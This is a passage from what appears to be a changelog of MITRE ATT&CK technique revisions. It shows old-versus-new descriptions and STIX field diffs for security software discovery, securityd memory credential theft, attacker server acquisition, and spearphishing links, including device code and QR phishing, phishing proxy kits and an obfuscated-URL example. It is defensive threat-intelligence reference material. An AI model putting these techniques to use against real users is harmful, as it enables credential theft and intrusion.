may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents may collect metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Expel IO Evil in AWS', 'description': 'A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.', 'url': 'https://expel.io/blog/finding-evil-in-aws/'}
external_references{'source_name': 'DescribeSecurityGroups - Amazon Elastic Compute Cloud', 'description': 'Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022.', 'url': 'https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html'}
x_mitre_platformsAzure AD
x_mitre_platformsOffice 365
x_mitre_platformsSaaS
x_mitre_platformsGoogle Workspace

[T1555.002] Credentials from Password Stores: Securityd Memory

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may obtain root access (allowing them to read st1An adversary with root access may gather credentials by read
>ecurityd’s memory), then they can scan through memory to fin>ing `securityd`’s memory. `securityd` is a service/daemon re
>d the correct sequence of keys in relatively few tries to de>sponsible for implementing security protocols such as encryp
>crypt the user’s logon keychain. This provides the adversary>tion and authorization.(Citation: Apple Dev SecurityD) A pri
> with all the plaintext passwords for users, WiFi, mail, bro>vileged adversary may be able to scan through `securityd`'s 
>wsers, certificates, secure notes, etc.(Citation: OS X Keych>memory to find the correct sequence of keys to decrypt the u
>ain)(Citation: OSX Keydnap malware)  In OS X prior to El Cap>ser’s logon keychain. This may provide the adversary with va
>itan, users with root access can read plaintext keychain pas>rious plaintext passwords, such as those for users, WiFi, ma
>swords of logged-in users because Apple’s keychain implement>il, browsers, certificates, secure notes, etc.(Citation: OS 
>ation allows these credentials to be cached so that users ar>X Keychain)(Citation: OSX Keydnap malware)  In OS X prior to
>e not repeatedly prompted for passwords.(Citation: OS X Keyc> El Capitan, users with root access can read plaintext keych
>hain)(Citation: External to DA, the OS X Way) Apple’s securi>ain passwords of logged-in users because Apple’s keychain im
>tyd utility takes the user’s logon password, encrypts it wit>plementation allows these credentials to be cached so that u
>h PBKDF2, and stores this master key in memory. Apple also u>sers are not repeatedly prompted for passwords.(Citation: OS
>ses a set of keys and algorithms to encrypt the user’s passw> X Keychain)(Citation: External to DA, the OS X Way) Apple’s
>ord, but once the master key is found, an adversary need onl> `securityd` utility takes the user’s logon password, encryp
>y iterate over the other values to unlock the final password>ts it with PBKDF2, and stores this master key in memory. App
>.(Citation: OS X Keychain)>le also uses a set of keys and algorithms to encrypt the use
 >r’s password, but once the master key is found, an adversary
 > need only iterate over the other values to unlock the final
 > password.(Citation: OS X Keychain)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['root']
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:43:20.609000+00:002024-03-29 16:37:34.772000+00:00
descriptionAn adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s `securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Apple Dev SecurityD', 'description': 'Apple. (n.d.). Security Server and Security Agent. Retrieved March 29, 2024.', 'url': 'https://developer.apple.com/library/archive/documentation/Security/Conceptual/Security_Overview/Architecture/Architecture.html'}

[T1583.004] Acquire Infrastructure: Server

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may buy, lease, or rent physical servers that cat1Adversaries may buy, lease, rent, or obtain physical servers
>n be used during targeting. Use of servers allows an adversa> that can be used during targeting. Use of servers allows an
>ry to stage, launch, and execute an operation. During post-c> adversary to stage, launch, and execute an operation. Durin
>ompromise activity, adversaries may utilize servers for vari>g post-compromise activity, adversaries may utilize servers 
>ous tasks, including for Command and Control. Adversaries ma>for various tasks, such as watering hole operations in [Driv
>y use web servers to support support watering hole operation>e-by Compromise](https://attack.mitre.org/techniques/T1189),
>s, as in [Drive-by Compromise](https://attack.mitre.org/tech> enabling [Phishing](https://attack.mitre.org/techniques/T15
>niques/T1189), or email servers to support [Phishing](https:>66) operations, or facilitating [Command and Control](https:
>//attack.mitre.org/techniques/T1566) operations. Instead of >//attack.mitre.org/tactics/TA0011). Instead of compromising 
>compromising a third-party [Server](https://attack.mitre.org>a third-party [Server](https://attack.mitre.org/techniques/T
>/techniques/T1584/004) or renting a [Virtual Private Server]>1584/004) or renting a [Virtual Private Server](https://atta
>(https://attack.mitre.org/techniques/T1583/003), adversaries>ck.mitre.org/techniques/T1583/003), adversaries may opt to c
> may opt to configure and run their own servers in support o>onfigure and run their own servers in support of operations.
>f operations.  Adversaries may only need a lightweight setup> Free trial periods of cloud servers may also be abused.(Cit
> if most of their activities will take place using online in>ation: Free Trial PurpleUrchin)(Citation: Freejacked)   Adve
>frastructure. Or, they may need to build extensive infrastru>rsaries may only need a lightweight setup if most of their a
>cture if they want to test, communicate, and control other a>ctivities will take place using online infrastructure. Or, t
>spects of their activities on their own systems.(Citation: N>hey may need to build extensive infrastructure if they want 
>YTStuxnet)>to test, communicate, and control other aspects of their act
 >ivities on their own systems.(Citation: NYTStuxnet)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 20:18:42.003000+00:002024-02-28 21:22:52.176000+00:00
descriptionAdversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked) Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Freejacked', 'description': 'Clark, Michael. (2023, August 14). Google’s Vertex AI Platform Gets Freejacked. Retrieved February 28, 2024.', 'url': 'https://sysdig.com/blog/googles-vertex-ai-platform-freejacked/'}
external_references{'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1518] Software Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may attempt to get a listing of software and soft1Adversaries may attempt to get a listing of software and sof
>tware versions that are installed on a system or in a cloud >tware versions that are installed on a system or in a cloud 
>environment. Adversaries may use the information from [Softw>environment. Adversaries may use the information from [Softw
>are Discovery](https://attack.mitre.org/techniques/T1518) du>are Discovery](https://attack.mitre.org/techniques/T1518) du
>ring automated discovery to shape follow-on behaviors, inclu>ring automated discovery to shape follow-on behaviors, inclu
>ding whether or not the adversary fully infects the target a>ding whether or not the adversary fully infects the target a
>nd/or attempts specific actions.  Adversaries may attempt to>nd/or attempts specific actions.  Such software may be deplo
> enumerate software for a variety of reasons, such as figuri>yed widely across the environment for configuration manageme
>ng out what security measures are present or if the compromi>nt or security reasons, such as [Software Deployment Tools](
>sed system has a version of software that is vulnerable to [>https://attack.mitre.org/techniques/T1072), and may allow ad
>Exploitation for Privilege Escalation](https://attack.mitre.>versaries broad access to infect devices or move laterally. 
>org/techniques/T1068).> Adversaries may attempt to enumerate software for a variety
 > of reasons, such as figuring out what security measures are
 > present or if the compromised system has a version of softw
 >are that is vulnerable to [Exploitation for Privilege Escala
 >tion](https://attack.mitre.org/techniques/T1068).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:50.920000+00:002024-04-16 00:16:06.689000+00:00
descriptionAdversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_platformsAzure AD
x_mitre_platformsOffice 365
x_mitre_platformsSaaS
x_mitre_platformsGoogle Workspace

[T1566.002] Phishing: Spearphishing Link

Current version: 2.6

Version changed from: 2.5 → 2.6


Old Description
New Description
t1Adversaries may send spearphishing emails with a malicious lt1Adversaries may send spearphishing emails with a malicious l
>ink in an attempt to gain access to victim systems. Spearphi>ink in an attempt to gain access to victim systems. Spearphi
>shing with a link is a specific variant of spearphishing. It>shing with a link is a specific variant of spearphishing. It
> is different from other forms of spearphishing in that it e> is different from other forms of spearphishing in that it e
>mploys the use of links to download malware contained in ema>mploys the use of links to download malware contained in ema
>il, instead of attaching malicious files to the email itself>il, instead of attaching malicious files to the email itself
>, to avoid defenses that may inspect email attachments. Spea>, to avoid defenses that may inspect email attachments. Spea
>rphishing may also involve social engineering techniques, su>rphishing may also involve social engineering techniques, su
>ch as posing as a trusted source.  All forms of spearphishin>ch as posing as a trusted source.  All forms of spearphishin
>g are electronically delivered social engineering targeted a>g are electronically delivered social engineering targeted a
>t a specific individual, company, or industry. In this case,>t a specific individual, company, or industry. In this case,
> the malicious emails contain links. Generally, the links wi> the malicious emails contain links. Generally, the links wi
>ll be accompanied by social engineering text and require the>ll be accompanied by social engineering text and require the
> user to actively click or copy and paste a URL into a brows> user to actively click or copy and paste a URL into a brows
>er, leveraging [User Execution](https://attack.mitre.org/tec>er, leveraging [User Execution](https://attack.mitre.org/tec
>hniques/T1204). The visited website may compromise the web b>hniques/T1204). The visited website may compromise the web b
>rowser using an exploit, or the user will be prompted to dow>rowser using an exploit, or the user will be prompted to dow
>nload applications, documents, zip files, or even executable>nload applications, documents, zip files, or even executable
>s depending on the pretext for the email in the first place.>s depending on the pretext for the email in the first place.
>  Adversaries may also include links that are intended to in>  Adversaries may also include links that are intended to in
>teract directly with an email reader, including embedded ima>teract directly with an email reader, including embedded ima
>ges intended to exploit the end system directly. Additionall>ges intended to exploit the end system directly. Additionall
>y, adversaries may use seemingly benign links that abuse spe>y, adversaries may use seemingly benign links that abuse spe
>cial characters to mimic legitimate websites (known as an "I>cial characters to mimic legitimate websites (known as an "I
>DN homograph attack").(Citation: CISA IDN ST05-016) URLs may>DN homograph attack").(Citation: CISA IDN ST05-016) URLs may
> also be obfuscated by taking advantage of quirks in the URL> also be obfuscated by taking advantage of quirks in the URL
> schema, such as the acceptance of integer- or hexadecimal-b> schema, such as the acceptance of integer- or hexadecimal-b
>ased hostname formats and the automatic discarding of text b>ased hostname formats and the automatic discarding of text b
>efore an “@” symbol: for example, `hxxp://google.com@1157586>efore an “@” symbol: for example, `hxxp://google.com@1157586
>937`.(Citation: Mandiant URL Obfuscation 2023)  Adversaries >937`.(Citation: Mandiant URL Obfuscation 2023)  Adversaries 
>may also utilize links to perform consent phishing, typicall>may also utilize links to perform consent phishing, typicall
>y with OAuth 2.0 request URLs that when accepted by the user>y with OAuth 2.0 request URLs that when accepted by the user
> provide permissions/access for malicious applications, allo> provide permissions/access for malicious applications, allo
>wing adversaries to  [Steal Application Access Token](https:>wing adversaries to  [Steal Application Access Token](https:
>//attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro>//attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro
> Pawn Storm OAuth 2017) These stolen access tokens allow the> Pawn Storm OAuth 2017) These stolen access tokens allow the
> adversary to perform various actions on behalf of the user > adversary to perform various actions on behalf of the user 
>via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishi>via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishi
>ng 2021)>ng 2021)  Adversaries may also utilize spearphishing links t
 >o [Steal Application Access Token](https://attack.mitre.org/
 >techniques/T1528)s that grant immediate access to the victim
 > environment. For example, a user may be lured through “cons
 >ent phishing” into granting adversaries permissions/access v
 >ia a malicious OAuth 2.0 request URL .(Citation: Trend Micro
 > Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consen
 >t Phishing 2021)  Similarly, malicious links may also target
 > device-based authorization, such as OAuth 2.0 device author
 >ization grant flow which is typically used to authenticate d
 >evices without UIs/browsers. Known as “device code phishing,
 >” an adversary may send a link that directs the victim to a 
 >malicious authorization page where the user is tricked into 
 >entering a code/credentials that produces a device token.(Ci
 >tation: SecureWorks Device Code Phishing 2021)(Citation: Net
 >skope Device Code Phishing 2021)(Citation: Optiv Device Code
 > Phishing 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-06 14:08:51.616000+00:002024-04-15 23:51:25.037000+00:00
descriptionAdversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021) Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.52.6
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Netskope Device Code Phishing 2021', 'description': 'Jenko Hwong. (2021, August 10). New Phishing Attacks Exploiting OAuth Authorization Flows (Part 1). Retrieved March 19, 2024.', 'url': 'https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1'}
external_references{'source_name': 'Optiv Device Code Phishing 2021', 'description': 'Optiv. (2021, August 17). Microsoft 365 OAuth Device Code Flow and Phishing. Retrieved March 19, 2024.', 'url': 'https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing'}
external_references{'source_name': 'SecureWorks Device Code Phishing 2021', 'description': 'SecureWorks Counter Threat Unit Research Team. (2021, June 3). OAuth’S Device Code Flow Abused in Phishing Attacks. Retrieved March 19, 2024.', 'url': 'https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks'}

[T1598.003] Phishing for Information: Spearphishing Link

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
New Description
t1Adversaries may send spearphishing messages with a malicioust1Adversaries may send spearphishing messages with a malicious
> link to elicit sensitive information that can be used durin> link to elicit sensitive information that can be used durin
>g targeting. Spearphishing for information is an attempt to >g targeting. Spearphishing for information is an attempt to 
>trick targets into divulging information, frequently credent>trick targets into divulging information, frequently credent
>ials or other actionable information. Spearphishing for info>ials or other actionable information. Spearphishing for info
>rmation frequently involves social engineering techniques, s>rmation frequently involves social engineering techniques, s
>uch as posing as a source with a reason to collect informati>uch as posing as a source with a reason to collect informati
>on (ex: [Establish Accounts](https://attack.mitre.org/techni>on (ex: [Establish Accounts](https://attack.mitre.org/techni
>ques/T1585) or [Compromise Accounts](https://attack.mitre.or>ques/T1585) or [Compromise Accounts](https://attack.mitre.or
>g/techniques/T1586)) and/or sending multiple, seemingly urge>g/techniques/T1586)) and/or sending multiple, seemingly urge
>nt messages.  All forms of spearphishing are electronically >nt messages.  All forms of spearphishing are electronically 
>delivered social engineering targeted at a specific individu>delivered social engineering targeted at a specific individu
>al, company, or industry. In this scenario, the malicious em>al, company, or industry. In this scenario, the malicious em
>ails contain links generally accompanied by social engineeri>ails contain links generally accompanied by social engineeri
>ng text to coax the user to actively click or copy and paste>ng text to coax the user to actively click or copy and paste
> a URL into a browser.(Citation: TrendMictro Phishing)(Citat> a URL into a browser.(Citation: TrendMictro Phishing)(Citat
>ion: PCMag FakeLogin) The given website may be a clone of a >ion: PCMag FakeLogin) The given website may be a clone of a 
>legitimate site (such as an online or corporate login portal>legitimate site (such as an online or corporate login portal
>) or may closely resemble a legitimate site in appearance an>) or may closely resemble a legitimate site in appearance an
>d have a URL containing elements from the real site. URLs ma>d have a URL containing elements from the real site. URLs ma
>y also be obfuscated by taking advantage of quirks in the UR>y also be obfuscated by taking advantage of quirks in the UR
>L schema, such as the acceptance of integer- or hexadecimal->L schema, such as the acceptance of integer- or hexadecimal-
>based hostname formats and the automatic discarding of text >based hostname formats and the automatic discarding of text 
>before an “@” symbol: for example, `hxxp://google.com@115758>before an “@” symbol: for example, `hxxp://google.com@115758
>6937`.(Citation: Mandiant URL Obfuscation 2023)  Adversaries>6937`.(Citation: Mandiant URL Obfuscation 2023)  Adversaries
> may also link to "web bugs" or "web beacons" within phishin> may also embed “tracking pixels”, "web bugs", or "web beaco
>g messages to verify the receipt of an email, while also pot>ns" within phishing messages to verify the receipt of an ema
>entially profiling and tracking victim information such as I>il, while also potentially profiling and tracking victim inf
>P address.(Citation: NIST Web Bug)  Adversaries may also be >ormation such as IP address.(Citation: NIST Web Bug) (Citati
>able to spoof a complete website using what is known as a "b>on: Ryte Wiki) These mechanisms often appear as small images
>rowser-in-the-browser" (BitB) attack. By generating a fake b> (typically one pixel in size) or otherwise obfuscated objec
>rowser popup window with an HTML-based address bar that appe>ts and are typically delivered as HTML code containing a lin
>ars to contain a legitimate URL (such as an authentication p>k to a remote server. (Citation: Ryte Wiki)(Citation: IAPP) 
>ortal), they may be able to prompt users to enter their cred> Adversaries may also be able to spoof a complete website us
>entials while bypassing typical URL verification methods.(Ci>ing what is known as a "browser-in-the-browser" (BitB) attac
>tation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)  Adv>k. By generating a fake browser popup window with an HTML-ba
>ersaries can use phishing kits such as `EvilProxy` and `Evil>sed address bar that appears to contain a legitimate URL (su
>ginx2` to proxy the connection between the victim and the le>ch as an authentication portal), they may be able to prompt 
>gitimate website. On a successful login, the victim is redir>users to enter their credentials while bypassing typical URL
>ected to the legitimate website, while the adversary capture> verification methods.(Citation: ZScaler BitB 2020)(Citation
>s their session cookie (i.e., [Steal Web Session Cookie](htt>: Mr. D0x BitB 2022)  Adversaries can use phishing kits such
>ps://attack.mitre.org/techniques/T1539)) in addition to thei> as `EvilProxy` and `Evilginx2` to perform adversary-in-the-
>r username and password. This may enable the adversary to th>middle phishing by proxying the connection between the victi
>en bypass MFA via [Web Session Cookie](https://attack.mitre.>m and the legitimate website. On a successful login, the vic
>org/techniques/T1550/004).(Citation: Proofpoint Human Factor>tim is redirected to the legitimate website, while the adver
>)  From the fake website, information is gathered in web for>sary captures their session cookie (i.e., [Steal Web Session
>ms and sent to the adversary. Adversaries may also use infor> Cookie](https://attack.mitre.org/techniques/T1539)) in addi
>mation from previous reconnaissance efforts (ex: [Search Ope>tion to their username and password. This may enable the adv
>n Websites/Domains](https://attack.mitre.org/techniques/T159>ersary to then bypass MFA via [Web Session Cookie](https://a
>3) or [Search Victim-Owned Websites](https://attack.mitre.or>ttack.mitre.org/techniques/T1550/004).(Citation: Proofpoint 
>g/techniques/T1594)) to craft persuasive and believable lure>Human Factor)  Adversaries may also send a malicious link in
>s.> the form of Quick Response (QR) Codes (also known as “quish
 >ing”). These links may direct a victim to a credential phish
 >ing page.(Citation: QR-campaign-energy-firm) By using a QR c
 >ode, the URL may not be exposed in the email and may thus go
 > undetected by most automated email security scans.(Citation
 >: qr-phish-agriculture) These QR codes may be scanned by or 
 >delivered directly  to a user’s mobile device (i.e., [Phishi
 >ng](https://attack.mitre.org/techniques/T1660)), which may b
 >e less secure in several relevant ways.(Citation: qr-phish-a
 >griculture) For example, mobile users may not be able to not
 >ice minor differences between genuine and credential harvest
 >ing websites due to mobile’s smaller form factor.  From the 
 >fake website, information is gathered in web forms and sent 
 >to the adversary. Adversaries may also use information from 
 >previous reconnaissance efforts (ex: [Search Open Websites/D
 >omains](https://attack.mitre.org/techniques/T1593) or [Searc
 >h Victim-Owned Websites](https://attack.mitre.org/techniques
 >/T1594)) to craft persuasive and believable lures.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 01:44:28.081000+00:002024-04-19 13:26:16.082000+00:00
descriptionAdversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023) Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022) Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor) From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly 